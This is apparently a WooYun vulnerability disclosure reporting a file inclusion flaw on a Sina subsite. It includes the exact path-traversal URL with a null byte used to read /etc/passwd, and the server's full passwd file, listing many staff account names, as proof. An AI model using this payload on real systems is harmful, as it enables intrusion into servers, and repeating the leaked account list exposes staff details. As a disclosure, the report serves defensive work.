当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146401

漏洞标题:新浪某分站存在文件包含漏洞

相关厂商:新浪

漏洞作者: AA侠

提交时间:2015-10-13 13:07

修复时间:2015-11-27 13:28

公开时间:2015-11-27 13:28

漏洞类型:文件包含

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-23: 细节向核心白帽子及相关领域专家公开
2015-11-02: 细节向普通白帽子公开
2015-11-12: 细节向实习白帽子公开
2015-11-27: 细节向公众公开

简要描述:

新浪某分站存在文件包含漏洞

详细说明:

http://zhiyuan.edu.sina.com.cn/index.php?a=../../../../../../../../../../etc/passwd%00&p=zhiyuan2015&s=solution

漏洞证明:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sysmon:x:60422:60422::/nonexistent:/nologin
sshd:x:500:500::/home/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
libin1:x:502:502::/usr/home/libin1:/bin/bash
junhai:x:503:503::/usr/home/junhai:/bin/bash
qingming:x:504:504::/usr/home/qingming:/bin/bash
liyuan:x:505:505::/usr/home/liyuan:/bin/bash
hangang:x:507:507::/usr/home/hangang:/bin/bash
wangshuo:x:508:508::/usr/home/wangshuo:/bin/bash
xiaoyue1:x:511:511::/usr/home/xiaoyue1:/bin/bash
mysql:x:3306:3306:SinaSRV MySQL User:/var/lib/mysql:/sbin/nologin
dpoolbus:x:3307:3307::/home/dpoolbus:/bin/bash
dbabus:x:3308:3308::/home/dbabus:/bin/bash
www:x:80:80::/usr/local/sinasrv2:/sbin/nologin
xiaopeng4:x:3356:3356::/usr/home/xiaopeng4:/bin/bash
haiqing1:x:3361:3361::/usr/home/haiqing1:/bin/bash
litao:x:3362:3362::/usr/home/litao:/bin/bash
jingwei5:x:3365:3365::/usr/home/jingwei5:/bin/bash
hanfang:x:3366:3366::/usr/home/hanfang:/bin/bash
zhutao3:x:3370:3370::/usr/home/zhutao3:/bin/bash
huixiang:x:3371:3371::/usr/home/huixiang:/bin/bash
chunwu:x:3380:3380::/usr/home/chunwu:/bin/bash
liwei24:x:3383:3383::/usr/home/liwei24:/bin/bash
lifeng5:x:3390:3390::/usr/home/lifeng5:/bin/bash
yangting1:x:3391:3391::/usr/home/yangting1:/bin/bash
wangzhe:x:3392:3392::/usr/home/wangzhe:/bin/bash
zhikai:x:3393:3393::/usr/home/zhikai:/bin/bash
pengjie:x:3394:3394::/usr/home/pengjie:/bin/bash
leilei3:x:3395:3395::/usr/home/leilei3:/bin/bash
xueping1:x:3399:3399::/usr/home/xueping1:/bin/bash
lizhen5:x:3400:3400::/usr/home/lizhen5:/bin/bash
liyong1:x:3402:3402::/usr/home/liyong1:/bin/bash
rdsup_api:x:3403:3403::/usr/home/rdsup_api:/bin/bash
chenyang:x:3404:3404::/usr/home/chenyang:/bin/bash
kaiwei3:x:3408:3408::/usr/home/kaiwei3:/bin/bash
zhigang6:x:3411:3411::/usr/home/zhigang6:/bin/bash
xiaodong2:x:3416:3416::/usr/home/xiaodong2:/bin/bash
baohua:x:3425:3425::/usr/home/baohua:/bin/bash
kaijun1:x:3427:3427::/usr/home/kaijun1:/bin/bash
haifeng11:x:3428:3428::/usr/home/haifeng11:/bin/bash
xuesong5:x:3429:3429::/usr/home/xuesong5:/bin/bash
hongze:x:3430:3430::/usr/home/hongze:/bin/bash
zhanyi1:x:3431:3431::/usr/home/zhanyi1:/bin/bash
guoli5:x:3432:3432::/usr/home/guoli5:/bin/bash
rdim_api:x:3433:3433::/usr/home/rdim_api:/bin/bash
dalong1:x:3434:3434::/usr/home/dalong1:/bin/bash

修复方案:

# 过滤

版权声明:转载请注明来源 AA侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-13 13:27

厂商回复:

感谢支持,漏洞修复中

最新状态:

暂无